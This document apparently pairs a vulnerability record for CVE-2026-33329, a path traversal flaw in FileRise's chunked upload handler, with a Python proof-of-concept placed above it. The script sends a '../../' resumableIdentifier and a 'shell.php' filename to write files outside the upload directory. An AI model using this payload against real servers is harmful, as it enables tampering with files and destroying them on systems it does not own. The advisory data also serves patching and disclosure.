CVE-2026-33329

import requests # Target configuration target_url = "http://target-filerise-instance/upload" session_cookie = "PHPSESSID=attacker_session_id" # Authenticated session # Malicious payload using path traversal in resumableIdentifier # This attempts to write a file to the root directory or a sensitive location payload = { "resumableChunkNumber": "1", "resumableTotalChunks": "1", "resumableIdentifier": "../../tmp/malicious_file.txt", # Path traversal payload "resumableFilename": "shell.php", "file": ("content.txt", "malicious content") } headers = { "Cookie": session_cookie } response = requests.post(target_url, files=payload, headers=headers) if response.status_code == 200: print("Exploit successful, file written outside intended directory.") else: print(f"Exploit failed, status code: {response.status_code}")

{"cve": {"id": "CVE-2026-33329", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:28.217", "lastModified": "2026-03-26T11:59:50.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FileRise is a self-hosted web file manager / WebDAV server. From version 1.0.1 to before version 3.10.0, the resumableIdentifier parameter in the Resumable.js chunked upload handler (UploadModel::handleUpload()) is concatenated directly into filesystem paths without any sanitization. An authenticated user with upload permission can exploit this to write files to arbitrary directories on the server, delete arbitrary directories via the post-assembly cleanup, and probe file/directory existence. This issue has been patched in version 3.10.0."}, {"lang": "es", "value": "FileRise es un gestor de archivos web / servidor WebDAV autoalojado. Desde la versión 1.0.1 hasta antes de la versión 3.10.0, el parámetro resumableIdentifier en el gestor de carga fragmentada de Resumable.js (UploadModel::handleUpload()) se concatena directamente en las rutas del sistema de archivos sin ninguna sanitización. Un usuario autenticado con permiso de carga puede explotar esto para escribir archivos en directorios arbitrarios en el servidor, eliminar directorios arbitrarios a través de la limpieza posterior al ensamblaje y sondear la existencia de archivos/directorios. Este problema ha sido parcheado en la versión 3.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.1", "versionEndExcluding": "3.10.0", "matchCriteriaId": "BC501FA6-2BC1-4D24-804D-57D7C060159D"}]}]}], "references": [{"url": "https://github.com/error311/FileRise/commit/3871f9fd1661688bed4f7dd23912be0ebf50973c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/error311/FileRise/releases/tag/v3.10.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/error311/FileRise/security/advisories/GHSA-c2jm-4wp9-5vrh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}